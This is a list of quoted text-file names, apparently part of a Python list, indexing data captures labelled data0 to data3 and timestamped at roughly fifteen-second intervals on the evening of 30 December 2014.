'data3Tue_Dec_30_21_21_00_2014.txt',
'data3Tue_Dec_30_21_21_15_2014.txt',
'data3Tue_Dec_30_21_21_30_2014.txt',
'data3Tue_Dec_30_21_21_45_2014.txt',
'data3Tue_Dec_30_21_21_59_2014.txt',
'data3Tue_Dec_30_21_22_14_2014.txt',
'data3Tue_Dec_30_21_22_29_2014.txt',
'data3Tue_Dec_30_21_22_44_2014.txt',
'data3Tue_Dec_30_21_22_58_2014.txt',
'data3Tue_Dec_30_21_23_14_2014.txt',
'data3Tue_Dec_30_21_23_28_2014.txt',
'data3Tue_Dec_30_21_23_43_2014.txt',
'data3Tue_Dec_30_21_23_58_2014.txt',
'data3Tue_Dec_30_21_24_13_2014.txt',
'data3Tue_Dec_30_21_24_28_2014.txt',
'data3Tue_Dec_30_21_24_43_2014.txt',
'data3Tue_Dec_30_21_24_58_2014.txt',
'data3Tue_Dec_30_21_25_12_2014.txt',
'data3Tue_Dec_30_21_25_28_2014.txt',
'data3Tue_Dec_30_21_25_43_2014.txt',
'data3Tue_Dec_30_21_25_58_2014.txt',
'data3Tue_Dec_30_21_26_12_2014.txt',
'data3Tue_Dec_30_21_26_27_2014.txt',
'data3Tue_Dec_30_21_26_42_2014.txt',
'data3Tue_Dec_30_21_26_57_2014.txt',
'data3Tue_Dec_30_21_27_12_2014.txt',
'data0Tue_Dec_30_21_27_52_2014.txt',
'data0Tue_Dec_30_21_28_07_2014.txt',
'data0Tue_Dec_30_21_28_22_2014.txt',
'data0Tue_Dec_30_21_28_37_2014.txt',
'data0Tue_Dec_30_21_28_51_2014.txt',
'data0Tue_Dec_30_21_29_06_2014.txt',
'data0Tue_Dec_30_21_29_21_2014.txt',
'data0Tue_Dec_30_21_29_36_2014.txt',
'data0Tue_Dec_30_21_29_51_2014.txt',
'data0Tue_Dec_30_21_30_06_2014.txt',
'data0Tue_Dec_30_21_30_21_2014.txt',
'data0Tue_Dec_30_21_30_36_2014.txt',
'data0Tue_Dec_30_21_30_50_2014.txt',
'data0Tue_Dec_30_21_31_06_2014.txt',
'data0Tue_Dec_30_21_31_21_2014.txt',
'data0Tue_Dec_30_21_31_36_2014.txt',
'data0Tue_Dec_30_21_31_51_2014.txt',
'data0Tue_Dec_30_21_32_06_2014.txt',
'data0Tue_Dec_30_21_32_21_2014.txt',
'data0Tue_Dec_30_21_32_36_2014.txt',
'data0Tue_Dec_30_21_32_51_2014.txt',
'data0Tue_Dec_30_21_33_05_2014.txt',
'data0Tue_Dec_30_21_33_20_2014.txt',
'data0Tue_Dec_30_21_33_35_2014.txt',
'data0Tue_Dec_30_21_33_50_2014.txt',
'data0Tue_Dec_30_21_34_05_2014.txt',
'data0Tue_Dec_30_21_34_20_2014.txt',
'data0Tue_Dec_30_21_34_34_2014.txt',
'data0Tue_Dec_30_21_34_49_2014.txt',
'data0Tue_Dec_30_21_35_04_2014.txt',
'data0Tue_Dec_30_21_35_20_2014.txt',
'data0Tue_Dec_30_21_35_35_2014.txt',
'data0Tue_Dec_30_21_35_49_2014.txt',
'data0Tue_Dec_30_21_36_04_2014.txt',
'data0Tue_Dec_30_21_36_19_2014.txt',
'data0Tue_Dec_30_21_36_34_2014.txt',
'data0Tue_Dec_30_21_36_49_2014.txt',
'data0Tue_Dec_30_21_37_04_2014.txt',
'data0Tue_Dec_30_21_37_19_2014.txt',
'data0Tue_Dec_30_21_37_34_2014.txt',
'data0Tue_Dec_30_21_37_49_2014.txt',
'data0Tue_Dec_30_21_38_04_2014.txt',
'data0Tue_Dec_30_21_38_18_2014.txt',
'data0Tue_Dec_30_21_38_33_2014.txt',
'data0Tue_Dec_30_21_38_48_2014.txt',
'data0Tue_Dec_30_21_39_03_2014.txt',
'data0Tue_Dec_30_21_39_18_2014.txt',
'data0Tue_Dec_30_21_39_33_2014.txt',
'data0Tue_Dec_30_21_39_48_2014.txt',
'data0Tue_Dec_30_21_40_02_2014.txt',
'data1Tue_Dec_30_21_40_18_2014.txt',
'data1Tue_Dec_30_21_40_33_2014.txt',
'data1Tue_Dec_30_21_40_48_2014.txt',
'data1Tue_Dec_30_21_41_02_2014.txt',
'data1Tue_Dec_30_21_41_17_2014.txt',
'data1Tue_Dec_30_21_41_31_2014.txt',
'data1Tue_Dec_30_21_41_46_2014.txt',
'data1Tue_Dec_30_21_42_01_2014.txt',
'data1Tue_Dec_30_21_42_16_2014.txt',
'data1Tue_Dec_30_21_42_31_2014.txt',
'data1Tue_Dec_30_21_42_46_2014.txt',
'data1Tue_Dec_30_21_43_01_2014.txt',
'data1Tue_Dec_30_21_43_16_2014.txt',
'data1Tue_Dec_30_21_43_31_2014.txt',
'data1Tue_Dec_30_21_43_46_2014.txt',
'data1Tue_Dec_30_21_44_01_2014.txt',
'data1Tue_Dec_30_21_44_15_2014.txt',
'data1Tue_Dec_30_21_44_30_2014.txt',
'data1Tue_Dec_30_21_44_46_2014.txt',
'data1Tue_Dec_30_21_45_01_2014.txt',
'data1Tue_Dec_30_21_45_15_2014.txt',
'data1Tue_Dec_30_21_45_30_2014.txt',
'data1Tue_Dec_30_21_45_45_2014.txt',
'data1Tue_Dec_30_21_46_00_2014.txt',
'data1Tue_Dec_30_21_46_15_2014.txt',
'data1Tue_Dec_30_21_46_29_2014.txt',
'data1Tue_Dec_30_21_46_44_2014.txt',
'data1Tue_Dec_30_21_46_59_2014.txt',
'data1Tue_Dec_30_21_47_14_2014.txt',
'data1Tue_Dec_30_21_47_29_2014.txt',
'data1Tue_Dec_30_21_47_44_2014.txt',
'data1Tue_Dec_30_21_47_59_2014.txt',
'data1Tue_Dec_30_21_48_13_2014.txt',
'data1Tue_Dec_30_21_48_28_2014.txt',
'data1Tue_Dec_30_21_48_43_2014.txt',
'data1Tue_Dec_30_21_48_58_2014.txt',
'data1Tue_Dec_30_21_49_13_2014.txt',
'data1Tue_Dec_30_21_49_28_2014.txt',
'data1Tue_Dec_30_21_49_43_2014.txt',
'data1Tue_Dec_30_21_49_57_2014.txt',
'data1Tue_Dec_30_21_50_13_2014.txt',
'data1Tue_Dec_30_21_50_27_2014.txt',
'data1Tue_Dec_30_21_50_42_2014.txt',
'data1Tue_Dec_30_21_50_57_2014.txt',
'data1Tue_Dec_30_21_51_12_2014.txt',
'data1Tue_Dec_30_21_51_27_2014.txt',
'data1Tue_Dec_30_21_51_42_2014.txt',
'data1Tue_Dec_30_21_51_56_2014.txt',
'data1Tue_Dec_30_21_52_11_2014.txt',
'data1Tue_Dec_30_21_52_26_2014.txt',
'data2Tue_Dec_30_21_52_40_2014.txt',
'data2Tue_Dec_30_21_52_55_2014.txt',
'data2Tue_Dec_30_21_53_10_2014.txt',
'data2Tue_Dec_30_21_53_25_2014.txt',
'data2Tue_Dec_30_21_53_40_2014.txt',
'data2Tue_Dec_30_21_53_54_2014.txt',
'data2Tue_Dec_30_21_54_09_2014.txt',
'data2Tue_Dec_30_21_54_24_2014.txt',
'data2Tue_Dec_30_21_54_39_2014.txt',
'data2Tue_Dec_30_21_54_53_2014.txt',
'data2Tue_Dec_30_21_55_08_2014.txt',
'data2Tue_Dec_30_21_55_23_2014.txt',
'data2Tue_Dec_30_21_55_38_2014.txt',
'data2Tue_Dec_30_21_55_53_2014.txt',
'data2Tue_Dec_30_21_56_08_2014.txt',
'data2Tue_Dec_30_21_56_23_2014.txt',
'data2Tue_Dec_30_21_56_37_2014.txt',
'data2Tue_Dec_30_21_56_52_2014.txt',
'data2Tue_Dec_30_21_57_07_2014.txt',
'data2Tue_Dec_30_21_57_22_2014.txt',
'data2Tue_Dec_30_21_57_37_2014.txt',
'data2Tue_Dec_30_21_57_51_2014.txt',
'data2Tue_Dec_30_21_58_06_2014.txt',
'data2Tue_Dec_30_21_58_21_2014.txt',
'data2Tue_Dec_30_21_58_35_2014.txt',
'data2Tue_Dec_30_21_58_50_2014.txt',
'data2Tue_Dec_30_21_59_05_2014.txt',
'data2Tue_Dec_30_21_59_20_2014.txt',
'data2Tue_Dec_30_21_59_34_2014.txt',
'data2Tue_Dec_30_21_59_50_2014.txt',
'data2Tue_Dec_30_22_00_05_2014.txt',
'data2Tue_Dec_30_22_00_19_2014.txt',
'data2Tue_Dec_30_22_00_34_2014.txt',
'data2Tue_Dec_30_22_00_49_2014.txt',
'data2Tue_Dec_30_22_01_03_2014.txt',
'data2Tue_Dec_30_22_01_18_2014.txt',
'data2Tue_Dec_30_22_01_33_2014.txt',
'data2Tue_Dec_30_22_01_48_2014.txt',
'data2Tue_Dec_30_22_02_03_2014.txt',
'data2Tue_Dec_30_22_02_18_2014.txt',
'data2Tue_Dec_30_22_02_32_2014.txt',
'data2Tue_Dec_30_22_02_47_2014.txt',
'data2Tue_Dec_30_22_03_02_2014.txt',
'data2Tue_Dec_30_22_03_17_2014.txt',
'data2Tue_Dec_30_22_03_31_2014.txt',
'data2Tue_Dec_30_22_03_46_2014.txt',
'data2Tue_Dec_30_22_04_01_2014.txt',
'data2Tue_Dec_30_22_04_15_2014.txt',
'data2Tue_Dec_30_22_04_30_2014.txt',
'data2Tue_Dec_30_22_04_45_2014.txt',
'data3Tue_Dec_30_22_05_00_2014.txt',
'data3Tue_Dec_30_22_05_15_2014.txt',
'data3Tue_Dec_30_22_05_30_2014.txt',
'data3Tue_Dec_30_22_05_44_2014.txt',
'data3Tue_Dec_30_22_06_00_2014.txt',
'data3Tue_Dec_30_22_06_14_2014.txt',
'data3Tue_Dec_30_22_06_29_2014.txt',
'data3Tue_Dec_30_22_06_44_2014.txt',
'data3Tue_Dec_30_22_06_59_2014.txt',
'data3Tue_Dec_30_22_07_14_2014.txt',
'data3Tue_Dec_30_22_07_29_2014.txt',
'data3Tue_Dec_30_22_07_43_2014.txt',
'data3Tue_Dec_30_22_07_58_2014.txt',
'data3Tue_Dec_30_22_08_13_2014.txt',
'data3Tue_Dec_30_22_08_28_2014.txt',
'data3Tue_Dec_30_22_08_43_2014.txt',
'data3Tue_Dec_30_22_08_57_2014.txt',
'data3Tue_Dec_30_22_09_12_2014.txt',
'data3Tue_Dec_30_22_09_27_2014.txt',
'data3Tue_Dec_30_22_09_42_2014.txt',
'data3Tue_Dec_30_22_09_57_2014.txt',
'data3Tue_Dec_30_22_10_12_2014.txt',
'data3Tue_Dec_30_22_10_26_2014.txt',
'data3Tue_Dec_30_22_10_41_2014.txt',
'data3Tue_Dec_30_22_10_56_2014.txt',
'data3Tue_Dec_30_22_11_11_2014.txt',
'data3Tue_Dec_30_22_11_25_2014.txt',
'data3Tue_Dec_30_22_11_41_2014.txt',
'data3Tue_Dec_30_22_11_56_2014.txt',
'data3Tue_Dec_30_22_12_11_2014.txt',
'data3Tue_Dec_30_22_12_26_2014.txt',
'data3Tue_Dec_30_22_12_40_2014.txt',
'data3Tue_Dec_30_22_12_55_2014.txt',
'data3Tue_Dec_30_22_13_10_2014.txt',
'data3Tue_Dec_30_22_13_25_2014.txt',
'data3Tue_Dec_30_22_13_40_2014.txt',
'data3Tue_Dec_30_22_13_55_2014.txt',
'data3Tue_Dec_30_22_14_09_2014.txt',
'data3Tue_Dec_30_22_14_24_2014.txt',
'data3Tue_Dec_30_22_14_39_2014.txt',
'data3Tue_Dec_30_22_14_53_2014.txt',
'data3Tue_Dec_30_22_15_08_2014.txt',
'data3Tue_Dec_30_22_15_23_2014.txt',
'data3Tue_Dec_30_22_15_37_2014.txt',
'data3Tue_Dec_30_22_15_52_2014.txt',
'data3Tue_Dec_30_22_16_07_2014.txt',
'data3Tue_Dec_30_22_16_22_2014.txt',
'data3Tue_Dec_30_22_16_36_2014.txt',
'data3Tue_Dec_30_22_16_51_2014.txt',
'data3Tue_Dec_30_22_17_06_2014.txt',
'data0Tue_Dec_30_22_17_47_2014.txt',
'data0Tue_Dec_30_22_18_01_2014.txt',
'data0Tue_Dec_30_22_18_16_2014.txt',
'data0Tue_Dec_30_22_18_31_2014.txt',
'data0Tue_Dec_30_22_18_46_2014.txt',
'data0Tue_Dec_30_22_19_01_2014.txt',
'data0Tue_Dec_30_22_19_15_2014.txt',
'data0Tue_Dec_30_22_19_30_2014.txt',
'data0Tue_Dec_30_22_19_45_2014.txt',
'data0Tue_Dec_30_22_20_00_2014.txt',
'data0Tue_Dec_30_22_20_15_2014.txt',
'data0Tue_Dec_30_22_20_30_2014.txt',
'data0Tue_Dec_30_22_20_44_2014.txt',
'data0Tue_Dec_30_22_20_59_2014.txt',
'data0Tue_Dec_30_22_21_14_2014.txt',
'data0Tue_Dec_30_22_21_29_2014.txt',
'data0Tue_Dec_30_22_21_44_2014.txt',
'data0Tue_Dec_30_22_21_58_2014.txt',
'data0Tue_Dec_30_22_22_13_2014.txt',
'data0Tue_Dec_30_22_22_28_2014.txt',
'data0Tue_Dec_30_22_22_43_2014.txt',
'data0Tue_Dec_30_22_22_58_2014.txt',
'data0Tue_Dec_30_22_23_12_2014.txt',
'data0Tue_Dec_30_22_23_27_2014.txt',
'data0Tue_Dec_30_22_23_42_2014.txt',
'data0Tue_Dec_30_22_23_57_2014.txt',
'data0Tue_Dec_30_22_24_12_2014.txt',
'data0Tue_Dec_30_22_24_26_2014.txt',
'data0Tue_Dec_30_22_24_41_2014.txt',
'data0Tue_Dec_30_22_24_56_2014.txt',
'data0Tue_Dec_30_22_25_11_2014.txt',
'data0Tue_Dec_30_22_25_25_2014.txt',
'data0Tue_Dec_30_22_25_41_2014.txt',
'data0Tue_Dec_30_22_25_55_2014.txt',
'data0Tue_Dec_30_22_26_10_2014.txt',
'data0Tue_Dec_30_22_26_25_2014.txt',
'data0Tue_Dec_30_22_26_39_2014.txt',
'data0Tue_Dec_30_22_26_54_2014.txt',
'data0Tue_Dec_30_22_27_09_2014.txt',
'data0Tue_Dec_30_22_27_24_2014.txt',
'data0Tue_Dec_30_22_27_39_2014.txt',
'data0Tue_Dec_30_22_27_54_2014.txt',
'data0Tue_Dec_30_22_28_09_2014.txt',
'data0Tue_Dec_30_22_28_23_2014.txt',
'data0Tue_Dec_30_22_28_38_2014.txt',
'data0Tue_Dec_30_22_28_53_2014.txt',
'data0Tue_Dec_30_22_29_08_2014.txt',
'data0Tue_Dec_30_22_29_23_2014.txt',
'data0Tue_Dec_30_22_29_37_2014.txt',
'data0Tue_Dec_30_22_29_52_2014.txt',
'data1Tue_Dec_30_22_30_07_2014.txt',
'data1Tue_Dec_30_22_30_21_2014.txt',
'data1Tue_Dec_30_22_30_36_2014.txt',
'data1Tue_Dec_30_22_30_51_2014.txt',
'data1Tue_Dec_30_22_31_06_2014.txt',
'data1Tue_Dec_30_22_31_20_2014.txt',
'data1Tue_Dec_30_22_31_35_2014.txt',
'data1Tue_Dec_30_22_31_49_2014.txt',
'data1Tue_Dec_30_22_32_04_2014.txt',
'data1Tue_Dec_30_22_32_19_2014.txt',
'data1Tue_Dec_30_22_32_34_2014.txt',
'data1Tue_Dec_30_22_32_48_2014.txt',
'data1Tue_Dec_30_22_33_03_2014.txt',
'data1Tue_Dec_30_22_33_18_2014.txt',
'data1Tue_Dec_30_22_33_33_2014.txt',
'data1Tue_Dec_30_22_33_48_2014.txt',
'data1Tue_Dec_30_22_34_03_2014.txt',
'data1Tue_Dec_30_22_34_17_2014.txt',
'data1Tue_Dec_30_22_34_32_2014.txt',
'data1Tue_Dec_30_22_34_47_2014.txt',
'data1Tue_Dec_30_22_35_01_2014.txt',
'data1Tue_Dec_30_22_35_16_2014.txt',
'data1Tue_Dec_30_22_35_31_2014.txt',
'data1Tue_Dec_30_22_35_46_2014.txt',
'data1Tue_Dec_30_22_36_01_2014.txt',
'data1Tue_Dec_30_22_36_16_2014.txt',
'data1Tue_Dec_30_22_36_30_2014.txt',
'data1Tue_Dec_30_22_36_45_2014.txt',
'data1Tue_Dec_30_22_37_00_2014.txt',
'data1Tue_Dec_30_22_37_15_2014.txt',
'data1Tue_Dec_30_22_37_30_2014.txt',
'data1Tue_Dec_30_22_37_44_2014.txt',
'data1Tue_Dec_30_22_37_59_2014.txt',
'data1Tue_Dec_30_22_38_14_2014.txt',
'data1Tue_Dec_30_22_38_28_2014.txt',
'data1Tue_Dec_30_22_38_44_2014.txt',
'data1Tue_Dec_30_22_38_58_2014.txt',
'data1Tue_Dec_30_22_39_13_2014.txt',
'data1Tue_Dec_30_22_39_28_2014.txt',
'data1Tue_Dec_30_22_39_42_2014.txt',
'data1Tue_Dec_30_22_39_57_2014.txt',
'data1Tue_Dec_30_22_40_13_2014.txt',
'data1Tue_Dec_30_22_40_27_2014.txt',
'data1Tue_Dec_30_22_40_41_2014.txt',
'data1Tue_Dec_30_22_40_56_2014.txt',
'data1Tue_Dec_30_22_41_11_2014.txt',
'data1Tue_Dec_30_22_41_26_2014.txt',
'data1Tue_Dec_30_22_41_41_2014.txt',
'data1Tue_Dec_30_22_41_56_2014.txt',
'data1Tue_Dec_30_22_42_10_2014.txt',
'data2Tue_Dec_30_22_42_25_2014.txt',
'data2Tue_Dec_30_22_42_40_2014.txt',
'data2Tue_Dec_30_22_42_54_2014.txt',
'data2Tue_Dec_30_22_43_09_2014.txt',
'data2Tue_Dec_30_22_43_24_2014.txt',
'data2Tue_Dec_30_22_43_39_2014.txt',
'data2Tue_Dec_30_22_43_53_2014.txt',
'data2Tue_Dec_30_22_44_08_2014.txt',
'data2Tue_Dec_30_22_44_23_2014.txt',
'data2Tue_Dec_30_22_44_37_2014.txt',
'data2Tue_Dec_30_22_44_52_2014.txt',
'data2Tue_Dec_30_22_45_06_2014.txt',
'data2Tue_Dec_30_22_45_21_2014.txt',
'data2Tue_Dec_30_22_45_36_2014.txt',
'data2Tue_Dec_30_22_45_50_2014.txt',
'data2Tue_Dec_30_22_46_05_2014.txt',
'data2Tue_Dec_30_22_46_20_2014.txt',
'data2Tue_Dec_30_22_46_35_2014.txt',
'data2Tue_Dec_30_22_46_50_2014.txt',
'data2Tue_Dec_30_22_47_05_2014.txt',
'data2Tue_Dec_30_22_47_20_2014.txt',
'data2Tue_Dec_30_22_47_35_2014.txt',
'data2Tue_Dec_30_22_47_49_2014.txt',
'data2Tue_Dec_30_22_48_04_2014.txt',
'data2Tue_Dec_30_22_48_19_2014.txt',
'data2Tue_Dec_30_22_48_34_2014.txt',
'data2Tue_Dec_30_22_48_49_2014.txt',
'data2Tue_Dec_30_22_49_04_2014.txt',
'data2Tue_Dec_30_22_49_19_2014.txt',
'data2Tue_Dec_30_22_49_34_2014.txt',
'data2Tue_Dec_30_22_49_49_2014.txt',
'data2Tue_Dec_30_22_50_04_2014.txt',
'data2Tue_Dec_30_22_50_19_2014.txt',
'data2Tue_Dec_30_22_50_33_2014.txt',
'data2Tue_Dec_30_22_50_48_2014.txt',
'data2Tue_Dec_30_22_51_03_2014.txt',
'data2Tue_Dec_30_22_51_18_2014.txt',
'data2Tue_Dec_30_22_51_32_2014.txt',
'data2Tue_Dec_30_22_51_47_2014.txt',
'data2Tue_Dec_30_22_52_02_2014.txt',
'data2Tue_Dec_30_22_52_16_2014.txt',
'data2Tue_Dec_30_22_52_31_2014.txt',
'data2Tue_Dec_30_22_52_46_2014.txt',
'data2Tue_Dec_30_22_53_01_2014.txt',
'data2Tue_Dec_30_22_53_16_2014.txt',
'data2Tue_Dec_30_22_53_31_2014.txt',
'data2Tue_Dec_30_22_53_45_2014.txt',
'data2Tue_Dec_30_22_54_00_2014.txt',
'data2Tue_Dec_30_22_54_15_2014.txt',
'data2Tue_Dec_30_22_54_29_2014.txt',
'data3Tue_Dec_30_22_54_44_2014.txt',
'data3Tue_Dec_30_22_54_59_2014.txt',
'data3Tue_Dec_30_22_55_13_2014.txt',
'data3Tue_Dec_30_22_55_28_2014.txt',
'data3Tue_Dec_30_22_55_43_2014.txt',
'data3Tue_Dec_30_22_55_58_2014.txt',
'data3Tue_Dec_30_22_56_13_2014.txt',
'data3Tue_Dec_30_22_56_28_2014.txt',
'data3Tue_Dec_30_22_56_43_2014.txt',
'data3Tue_Dec_30_22_56_57_2014.txt',
'data3Tue_Dec_30_22_57_12_2014.txt',
'data3Tue_Dec_30_22_57_27_2014.txt',
'data3Tue_Dec_30_22_57_42_2014.txt',
'data3Tue_Dec_30_22_57_56_2014.txt',
'data3Tue_Dec_30_22_58_12_2014.txt',
'data3Tue_Dec_30_22_58_26_2014.txt',
'data3Tue_Dec_30_22_58_41_2014.txt',
'data3Tue_Dec_30_22_58_56_2014.txt',
'data3Tue_Dec_30_22_59_10_2014.txt',
'data3Tue_Dec_30_22_59_25_2014.txt',
'data3Tue_Dec_30_22_59_40_2014.txt',
'data3Tue_Dec_30_22_59_54_2014.txt',
'data3Tue_Dec_30_23_00_10_2014.txt',
'data3Tue_Dec_30_23_00_25_2014.txt',
'data3Tue_Dec_30_23_00_39_2014.txt',
'data3Tue_Dec_30_23_00_54_2014.txt',
'data3Tue_Dec_30_23_01_09_2014.txt',
'data3Tue_Dec_30_23_01_23_2014.txt',
'data3Tue_Dec_30_23_01_38_2014.txt',
'data3Tue_Dec_30_23_01_53_2014.txt',
'data3Tue_Dec_30_23_02_07_2014.txt',
'data3Tue_Dec_30_23_02_22_2014.txt',
'data3Tue_Dec_30_23_02_37_2014.txt',
'data3Tue_Dec_30_23_02_52_2014.txt',
'data3Tue_Dec_30_23_03_06_2014.txt',
'data3Tue_Dec_30_23_03_21_2014.txt',
'data3Tue_Dec_30_23_03_36_2014.txt',
'data3Tue_Dec_30_23_03_51_2014.txt',
'data3Tue_Dec_30_23_04_05_2014.txt',
'data3Tue_Dec_30_23_04_20_2014.txt',
'data3Tue_Dec_30_23_04_34_2014.txt',
'data3Tue_Dec_30_23_04_49_2014.txt',
'data3Tue_Dec_30_23_05_04_2014.txt',
'data3Tue_Dec_30_23_05_19_2014.txt',
'data3Tue_Dec_30_23_05_34_2014.txt',
'data3Tue_Dec_30_23_05_49_2014.txt',
'data3Tue_Dec_30_23_06_04_2014.txt',
'data3Tue_Dec_30_23_06_18_2014.txt',
'data3Tue_Dec_30_23_06_33_2014.txt',
'data3Tue_Dec_30_23_06_48_2014.txt',
'data0Tue_Dec_30_23_07_28_2014.txt',
'data0Tue_Dec_30_23_07_42_2014.txt',
'data0Tue_Dec_30_23_07_58_2014.txt',
'data0Tue_Dec_30_23_08_12_2014.txt',
'data0Tue_Dec_30_23_08_27_2014.txt',
'data0Tue_Dec_30_23_08_42_2014.txt',
'data0Tue_Dec_30_23_08_57_2014.txt',
'data0Tue_Dec_30_23_09_12_2014.txt',
'data0Tue_Dec_30_23_09_27_2014.txt',
'data0Tue_Dec_30_23_09_42_2014.txt',
'data0Tue_Dec_30_23_09_57_2014.txt',
'data0Tue_Dec_30_23_10_12_2014.txt',
'data0Tue_Dec_30_23_10_26_2014.txt',
'data0Tue_Dec_30_23_10_42_2014.txt',
'data0Tue_Dec_30_23_10_57_2014.txt',
'data0Tue_Dec_30_23_11_12_2014.txt',
'data0Tue_Dec_30_23_11_27_2014.txt',
'data0Tue_Dec_30_23_11_42_2014.txt',
'data0Tue_Dec_30_23_11_56_2014.txt',
'data0Tue_Dec_30_23_12_11_2014.txt',
'data0Tue_Dec_30_23_12_26_2014.txt',
'data0Tue_Dec_30_23_12_40_2014.txt',
'data0Tue_Dec_30_23_12_55_2014.txt',
'data0Tue_Dec_30_23_13_10_2014.txt',
'data0Tue_Dec_30_23_13_25_2014.txt',
'data0Tue_Dec_30_23_13_40_2014.txt',
'data0Tue_Dec_30_23_13_55_2014.txt',
'data0Tue_Dec_30_23_14_11_2014.txt',
'data0Tue_Dec_30_23_14_26_2014.txt',
'data0Tue_Dec_30_23_14_40_2014.txt',
'data0Tue_Dec_30_23_14_55_2014.txt',
'data0Tue_Dec_30_23_15_09_2014.txt',
'data0Tue_Dec_30_23_15_24_2014.txt',
'data0Tue_Dec_30_23_15_39_2014.txt',
'data0Tue_Dec_30_23_15_54_2014.txt',
'data0Tue_Dec_30_23_16_08_2014.txt',
'data0Tue_Dec_30_23_16_23_2014.txt',
'data0Tue_Dec_30_23_16_37_2014.txt',
'data0Tue_Dec_30_23_16_52_2014.txt',
'data0Tue_Dec_30_23_17_08_2014.txt',
'data0Tue_Dec_30_23_17_23_2014.txt',
'data0Tue_Dec_30_23_17_37_2014.txt',
'data0Tue_Dec_30_23_17_52_2014.txt',
'data0Tue_Dec_30_23_18_07_2014.txt',
'data0Tue_Dec_30_23_18_22_2014.txt',
'data0Tue_Dec_30_23_18_36_2014.txt',
'data0Tue_Dec_30_23_18_51_2014.txt',
'data0Tue_Dec_30_23_19_06_2014.txt',
'data0Tue_Dec_30_23_19_21_2014.txt',
'data0Tue_Dec_30_23_19_36_2014.txt',
'data1Tue_Dec_30_23_19_50_2014.txt',
'data1Tue_Dec_30_23_20_05_2014.txt',
'data1Tue_Dec_30_23_20_20_2014.txt',
'data1Tue_Dec_30_23_20_34_2014.txt',
'data1Tue_Dec_30_23_20_49_2014.txt',
'data1Tue_Dec_30_23_21_04_2014.txt',
'data1Tue_Dec_30_23_21_19_2014.txt',
'data1Tue_Dec_30_23_21_33_2014.txt',
'data1Tue_Dec_30_23_21_48_2014.txt',
'data1Tue_Dec_30_23_22_03_2014.txt',
'data1Tue_Dec_30_23_22_18_2014.txt',
'data1Tue_Dec_30_23_22_33_2014.txt',
'data1Tue_Dec_30_23_22_48_2014.txt',
'data1Tue_Dec_30_23_23_03_2014.txt',
'data1Tue_Dec_30_23_23_17_2014.txt',
'data1Tue_Dec_30_23_23_32_2014.txt',
'data1Tue_Dec_30_23_23_47_2014.txt',
'data1Tue_Dec_30_23_24_02_2014.txt',
'data1Tue_Dec_30_23_24_16_2014.txt',
'data1Tue_Dec_30_23_24_31_2014.txt',
'data1Tue_Dec_30_23_24_45_2014.txt',
'data1Tue_Dec_30_23_25_00_2014.txt',
'data1Tue_Dec_30_23_25_15_2014.txt',
'data1Tue_Dec_30_23_25_29_2014.txt',
'data1Tue_Dec_30_23_25_44_2014.txt',
'data1Tue_Dec_30_23_25_59_2014.txt',
'data1Tue_Dec_30_23_26_13_2014.txt',
'data1Tue_Dec_30_23_26_28_2014.txt',
'data1Tue_Dec_30_23_26_43_2014.txt',
'data1Tue_Dec_30_23_26_58_2014.txt',
'data1Tue_Dec_30_23_27_13_2014.txt',
'data1Tue_Dec_30_23_27_27_2014.txt',
'data1Tue_Dec_30_23_27_42_2014.txt',
'data1Tue_Dec_30_23_27_57_2014.txt',
'data1Tue_Dec_30_23_28_11_2014.txt',
'data1Tue_Dec_30_23_28_26_2014.txt',
'data1Tue_Dec_30_23_28_42_2014.txt',
'data1Tue_Dec_30_23_28_56_2014.txt',
'data1Tue_Dec_30_23_29_11_2014.txt',
'data1Tue_Dec_30_23_29_26_2014.txt',
'data1Tue_Dec_30_23_29_41_2014.txt',
'data1Tue_Dec_30_23_29_56_2014.txt',
'data1Tue_Dec_30_23_30_10_2014.txt',
'data1Tue_Dec_30_23_30_25_2014.txt',
'data1Tue_Dec_30_23_30_40_2014.txt',
'data1Tue_Dec_30_23_30_55_2014.txt',
'data1Tue_Dec_30_23_31_10_2014.txt',
'data1Tue_Dec_30_23_31_25_2014.txt',
'data1Tue_Dec_30_23_31_39_2014.txt',
'data1Tue_Dec_30_23_31_54_2014.txt',
'data2Tue_Dec_30_23_32_09_2014.txt',
'data2Tue_Dec_30_23_32_24_2014.txt',
'data2Tue_Dec_30_23_32_39_2014.txt',
'data2Tue_Dec_30_23_32_53_2014.txt',
'data2Tue_Dec_30_23_33_08_2014.txt',
'data2Tue_Dec_30_23_33_23_2014.txt',
'data2Tue_Dec_30_23_33_38_2014.txt',
'data2Tue_Dec_30_23_33_53_2014.txt',
'data2Tue_Dec_30_23_34_08_2014.txt',
'data2Tue_Dec_30_23_34_23_2014.txt',
'data2Tue_Dec_30_23_34_37_2014.txt',
'data2Tue_Dec_30_23_34_52_2014.txt',
'data2Tue_Dec_30_23_35_07_2014.txt',
'data2Tue_Dec_30_23_35_22_2014.txt',
'data2Tue_Dec_30_23_35_37_2014.txt',
'data2Tue_Dec_30_23_35_52_2014.txt',
'data2Tue_Dec_30_23_36_07_2014.txt',
'data2Tue_Dec_30_23_36_22_2014.txt',
'data2Tue_Dec_30_23_36_36_2014.txt',
'data2Tue_Dec_30_23_36_51_2014.txt',
'data2Tue_Dec_30_23_37_06_2014.txt',
'data2Tue_Dec_30_23_37_20_2014.txt',
'data2Tue_Dec_30_23_37_35_2014.txt',
'data2Tue_Dec_30_23_37_50_2014.txt',
'data2Tue_Dec_30_23_38_05_2014.txt',
'data2Tue_Dec_30_23_38_20_2014.txt',
'data2Tue_Dec_30_23_38_35_2014.txt',
'data2Tue_Dec_30_23_38_50_2014.txt',
'data2Tue_Dec_30_23_39_05_2014.txt',
'data2Tue_Dec_30_23_39_19_2014.txt',
'data2Tue_Dec_30_23_39_34_2014.txt',
'data2Tue_Dec_30_23_39_49_2014.txt',
'data2Tue_Dec_30_23_40_04_2014.txt',
'data2Tue_Dec_30_23_40_18_2014.txt',
'data2Tue_Dec_30_23_40_33_2014.txt',
'data2Tue_Dec_30_23_40_48_2014.txt',
'data2Tue_Dec_30_23_41_03_2014.txt',
'data2Tue_Dec_30_23_41_18_2014.txt',
'data2Tue_Dec_30_23_41_33_2014.txt',
'data2Tue_Dec_30_23_41_48_2014.txt',
'data2Tue_Dec_30_23_42_03_2014.txt',
'data2Tue_Dec_30_23_42_18_2014.txt',
'data2Tue_Dec_30_23_42_33_2014.txt',
'data2Tue_Dec_30_23_42_47_2014.txt',
'data2Tue_Dec_30_23_43_02_2014.txt',
'data2Tue_Dec_30_23_43_18_2014.txt',
'data2Tue_Dec_30_23_43_33_2014.txt',
'data2Tue_Dec_30_23_43_47_2014.txt',
'data2Tue_Dec_30_23_44_02_2014.txt',
'data2Tue_Dec_30_23_44_17_2014.txt',
